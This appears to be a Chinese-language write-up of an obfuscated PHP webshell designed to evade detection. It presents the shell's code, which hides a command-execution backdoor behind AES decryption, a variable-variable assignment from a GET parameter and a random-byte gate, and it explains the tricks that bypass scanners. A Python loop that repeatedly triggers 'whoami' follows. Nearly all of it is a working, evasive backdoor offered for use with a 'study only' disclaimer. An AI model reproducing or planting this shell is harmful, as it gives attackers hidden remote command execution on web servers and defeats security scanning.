1,代码<?php
$d = True;
switch ($d) {
case '1':
$c = "AAAAA";
break;
case '2':
$c = "BBBBB";
break;
case '2':
$c = "CCCCC";
break;
default:
$c = "DDDDD";
break;
}
$command=openssl_decrypt("4arqW4DvZ6J3t0pR2jQDaQ==", 'AES-128-ECB', $c, 0);
$descriptors = [
0 => ['pipe', 'r'],
1 => ['pipe', 'w'],
2 => ['pipe', 'w'],
];
if(!test()){
$$command = $_GET['1'];
}
$process = proc_open($command, $descriptors, $pipes);
if (is_resource($process)) {
$output = stream_get_contents($pipes[1]);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo $output;
}
function test() {
$a = openssl_random_pseudo_bytes(1);
echo $a;
if ($a){
return 1;
} else {
return 0;
}
}
?>
3,检测
4,核心绕过点:
首先有个switch语句,我们让$d等于True,那么$c就等于AAAAA,那么经过openssl_decrypt后$command就等于$command,进而就可以传输参数了。
如果test函数返回0,那么就可以给command赋值,进而执行命令。我们在test函数里让变量a等于$a = openssl_random_pseudo_bytes(1); 生成一个伪随机字节串,那么就有概率是0;进而我们就可以去给command赋值,然后去执行命令了。
5,利用程序import requests
url = "http://127.0.0.1/1.php?1=whoami"
while 1:
req = requests.get(url=url).text
if("0" in req):
print(req)
exit()
7,仅供学习交流
|